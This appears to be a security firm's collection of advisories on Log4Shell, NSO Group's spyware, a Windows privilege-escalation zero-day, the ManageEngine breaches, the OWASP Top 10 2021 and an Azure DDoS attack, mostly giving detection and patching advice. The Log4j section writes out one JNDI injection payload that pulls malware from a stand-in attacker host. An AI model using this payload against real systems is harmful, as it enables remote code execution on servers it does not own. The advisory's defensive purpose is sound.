Penetration Testing

Log4j Update – What You Need to Know

Overview

On December 10^th, 2021, CVE-2021-44228 (Log4Shell) was released affecting the Log4j Java logging framework. This vulnerability received the highest possible CVSS score of 10 out of 10. There have been three other vulnerabilities released related to Log4j since then, but the original is the most critical by far. Initially discovered by Chen Zhaojun, who works for Alibaba’s security team, back on November 24^th, 2021 which was the privately disclosed to Apache. The risk of this vulnerability is so severe, as a precautionary measure, Canada shut down 4,000 government sites. Since the public release there has been reports of millions of attempts to exploit the vulnerability across the world, but as of January 10^th, CISA stated they have not seen any significant intrusions related to Log4j.

So, what is Log4j, what makes it so vulnerable, and how do you exploit it?

Log4j is a piece of software, which most surprisingly is developed and maintained by a group of volunteers, that was coded in Java and logs activity of users on computers. An example of activity that is captured and logged would be navigating to a nonworking link on a web page and receiving a 404 error. Log4j is also used for diagnostic messages in software such as amount of memory being used and user commands entered. The logging of this information isn’t the issue, it’s the fact that the code actively interprets the activity that it is logging, meaning that remote code can be executed. Within Log4j there is a feature called Java Naming Directory Interface (JNDI) that allows commands to be run that are wrapped in ${…}. This feature allows live lookups both inside and outside of your network. With this correct sequence of input, this feature can be used to place malware on the server and have full remote code execution on the host. An example input of ${jndi:ldap://myattackingmachine:9999/Malware} would reach out to an attacking machine IP on port 9999 and download the malware file that is being hosted.

Products affected

The image below, courtesy of xkcd, describes the impact of this vulnerability perfectly.

At this time, it’s almost safe to assume that all products are affected as Log4j has been discovered to be deeply embedded in so many pieces of software, even to some that were not aware of its existence. Popular products like Minecraft, Apple’s iCloud, AWS, the NSA’s reverse engineering tool Ghidra, and the list goes on. CISA continues to update their GitHub with a list of known products to be affected.

Detection & Patching

To discover what systems to patch, here are a few steps to take:

Identify any internet facing assets.
Use authenticated vulnerability scanning to detect devices that have been impacted.
If you have an endpoint detection and response (EDR) system, you can use that to search for Log4j files.
Determine the version of Log4j being used. Version 2.0 to 2.14.1 are the versions that are vulnerable.
Update to the current version 2.17.1.
Repeat the above steps on internal IT and OT systems.

To prevent Log4j from being exploited, there are a few steps to take.

Search logs for IPs that have known to be scanning for the vulnerability and add them to your block list. A running list of known IPs can be found here.
Block a list of IPs that have been used to host a malicious payload to execute the vulnerability.
Review the list of IOCs being updated by Microsoft.
Review the additional list of IOCs being updated by the Curated Intelligence Trust Group.

Additional links

There have been many articles and resources that have been published since the release of this vulnerability, so in addition to the links in this Security Advisory, nGuard wanted to provide a few additional for further reading.

If you want to try and exploit the vulnerability yourself, John Hammond and TryHackMe have created a room for you to do so. https://tryhackme.com/room/solar
A Growing List of Tenable Nessus Plugins being release for detection of Log4j. https://community.tenable.com/s/article/Plugins-associated-with-CVE-2021-44228-Log4Shell
The team at Huntress has had great coverage and updates, including an open-source tool to help detect the vulnerability. https://log4shell.huntress.com/
The National Cyber Security Centrum (NCSC-NL) has been maintaining another GitHub repository with a list of information for hunting, IOCs, detection and mitigation, scanning, and vulnerable software. https://github.com/NCSC-NL/log4shell
CISA Released an open-source Log4j Scanner. https://github.com/cisagov/log4j-scanner

If you feel you need assistance with the detection of vulnerable Log4j instances, have discovered a Log4j related incident, or need general security services related to this vulnerability or anything else, reach out to nGuard. nGuard offers Log4j scanning, consulting services, log management and event collection, and penetration testing services.

Apple Sues Spyware Firm NSO Group

If you are not familiar with NSO Group, nGuard released a Security Advisory in August detailing the history of the NSO Group and their spyware platform, Pegasus. If you haven’t read the advisory, check it out here, or you can watch the summary video below:

In late November, Apple announced that it is suing the Israeli spyware firm NSO Group and its parent company OSY Technologies for targeting its users with their spyware. This is the second lawsuit against NSO Group with the first coming from Facebook, now owned by Meta, for targeting its users on the message application WhatsApp.

In addition to the lawsuit, which is seeking unspecified damages, Apple is requesting the NSO Group be banned from using Apple software, services, or devices. NSO Group created over 100 fake Apple IDs used to deploy their spyware Pegasus, which violates the iCloud terms of service. NSO Group still states they only sell spyware to government for lawful interceptions and says, “Thousands of lives were saved around the world thanks to NSO Group’s technologies used by its customers.” Although the NSO group states it has ethical purposes, evidence has shown otherwise and has led to the United States implementing sanctions and a blacklist on them for enabling “transnational repression.”

Apple did release software updates to patch the vulnerabilities exploited by NSO Group and has not seen any indications of Pegasus or any other NSO tools being used against their latest software, iOS 15. Apple has strongly urged iOS users to upgrade to the latest version of software to protect themselves from these types of attacks.

URGENT Windows Zero-Day | InstallerFileTakeover

Yesterday afternoon Bleeping Computer reported on a critical Windows zero-day affecting all flavors of Windows client and server operating systems. A flaw in Microsoft’s patch for CVE-2021-41379 led to a post-authentication privilege escalation vulnerability that allows an attacker to pivot from a standard user account to NT AUTHORITY\SYSTEM with ease. Considering that there is currently no patch, it is essential that organizations begin alerting on this before breaking for Thanksgiving. Inform yourself and your team by reviewing the materials below.

Resources:

Several Organizations Breached By Foreign Hackers

On Monday, CNN reported that nine organizations spread across multiple sectors have been breached by what is believed to be foreign hackers. Palo Alto made it known to CNN that organizations within health care, technology, education, defense, and energy had all been the target of recent security breaches. It is also being reported that officials from the NSA and CISA are actively tracking the threat and working to mitigate it.

By exploiting a vulnerability in ManageEngine ADSelfService Plus which corporations utilize for password management and stealing those passwords from targeted organizations, attackers have been able to maintain persistent access on internal networks. This buys the attackers time to further their attack vectors and compromise more endpoints, as well as work to compromise high privilege accounts and increase their chances of accessing critical information. The official from Palo Alto that provided this information to CNN believe this is just the “tip of the spear” of the likely spying campaign that is taking place by foreign adversaries.

While it is currently unknown who is responsible for this attack, Palo Alto is reporting that many of the tactics and toolkits discovered are consistent with a suspected Chinese hacking group. The NSA and CISA, when asked to comment on the likely identity of these hackers, refused to comment. Officials from Palo Alto are stressing that it is extremely important to stay on top of software updates. Attackers are exploiting well known software vulnerabilities that could have been easily patched by the target organization. They are also encouraging organizations that utilize Zoho software to update their systems and search for signs of potential breach.

Vulnerable software is one of the top things attackers looks for when attempting to target an organization. Many times, these vulnerabilities and their corresponding exploits are widely known and easily preventable if you are aware of them. Conducting periodic penetration testing on both the external perimeter and internal network can prevent this vulnerabilities from being present in your environment. Additionally, having vulnerability scans run on a regular basis can make you aware of these critical vulnerabilities and your security team can eliminate them from the environment.

OWASP Top 10 2021 Update

The Open Web Application Security Project (OWASP) is a non-profit organization focused on improving the security of web application software. OWASP uses a community input model which welcomes input and contribution from the public. The Top 10 is a guidance document that ranks, what the community believes, are the top 10 most critical security risks that web applications face. Each risk is ranked in order of frequency discovered, severity of vulnerabilities, and potential impact.

OWASP recently released an update to its top 10 web application security threats for 2021. The last update to the list was in 2017, so this is something that was long overdue. With the ever-changing landscape in web application security, for 2021 OWASP has introduced 3 new categories, changed the names of categories, and consolidated a few items. OWASP Stated this is to, “focus on the root cause over the symptom.” Below is a summary of the changes:

Source: OWASP.org

The 3 new categories are:

A04:2021- Insecure Design
A08:2021- Software & Data Integrity Failures
A10:2021- Server-Side Request Forgery (SSRF)

To update the Top 10, OWASP utilized data from researchers for 8 of the top 10 categories, and similar to 2017, included 2 from their community survey. Often, the data is a lagging indicator for the threats the community on the front lines sees as the top threats. These are threats that may never be reflected in the data. Certain threats will take time to fine tune a testing methodology and then more time to create a way to test against those threats in an automated fashion.

There are data factors that are listed for each of the Top 10 Categories, here is what they mean:

CWEs Mapped: The number of CWEs mapped to a category by the Top 10 team.
Incidence Rate: Incidence rate is the percentage of applications vulnerable to that CWE from the population tested by that organization for that year.
Weighted Exploit: The Exploit sub-score from CVSSv2 and CVSSv3 scores assigned to CVEs mapped to CWEs, normalized, and placed on a 10pt scale.
Weighted Impact: The Impact sub-score from CVSSv2 and CVSSv3 scores assigned to CVEs mapped to CWEs, normalized, and placed on a 10pt scale.
(Testing) Coverage: The percentage of applications tested by all organizations for a given CWE.
Total Occurrences: Total number of applications found to have the CWEs mapped to a category.
Total CVEs: Total number of CVEs in the NVD DB that were mapped to the CWEs mapped to a category.

If you need to assess one of your web applications against the new OWASP Top 10, nGuard’s web application penetration testing is driven by the OWASP Top 10 and all findings are issued with a correlation to the application item within the top 10. Identify your weak points using the industry standard for web application assessments today!

Microsoft Azure Mitigates Impressive DDoS Attack

Microsoft is reporting that nearly 70,000 sources spread across the globe are responsible for one of the largest cyber-attacks in history. A Distributed Denial-of-Service (DDoS) attack is a cyber-attack in which the adversary attempts to make a machine or network resource unavailable to its intended users by flooding the target machine with requests in an attempt to overload the system. A report by Link11 suggests that DDoS attacks are on the rise, as we have seen a 33 percent increase during the first half of 2021.

Microsoft reports that the attack, while lasting only around 10 minutes, was one of the most significant they have ever seen. Bursts of traffic that peaked out at 2.4 Tbps were utilized in attempt to cripple servers and prevent legitimate traffic from reaching its target. While DDoS attacks on their own can be devastating for organizations with internet facing services, many times they are used as a distraction for an even more sophisticated attack. An attacker with persistent access to an internal network may use an external DDoS attack to distract IT staff while ransomware is deployed across the internal network.

The Azure security team was able to confirm that all services remained online during the attack due to security controls that mitigate the effect of large-scale DDoS attacks. How would your organization’s internet facing infrastructure hold up against an attack like this? Here are some mitigating steps:

Reduce Attack Surface – Limiting the internet facing attack landscape is the best way to reduce the risk of DDoS attacks.
Scaling – Scaling your infrastructure to absorb a large-scale DDoS attack can be a great way to mitigate risk. Utilizing Content Distribution Networks (CDNs) or Load Balancers to spread traffic out across multiple servers can limit the effect overwhelming amounts of traffic can have on a single server.
Know What is Normal – Having a general idea of what is a normal amount of traffic and what is not can assist you in configuring technologies to prevent against DDoS attacks. Configuring proper rate limiting and traffic analysis to block illegitimate traffic could save you a major headache.
Deploy Sophisticated Controls – Web Application Firewalls (WAFs) are sophisticated tool sets that can detect and block these types of attacks. They can be configured to protect your application by blocking source IPs, whitelisting specific geo-locations, and stopping illegitimate requests in their tracks.
Penetration Testing – Performing external and web application penetration tests can point you to vulnerabilities that would be at risk of a DDoS attack. Patching these holes on your external perimeter may save your organization from experiencing unproductive downtime.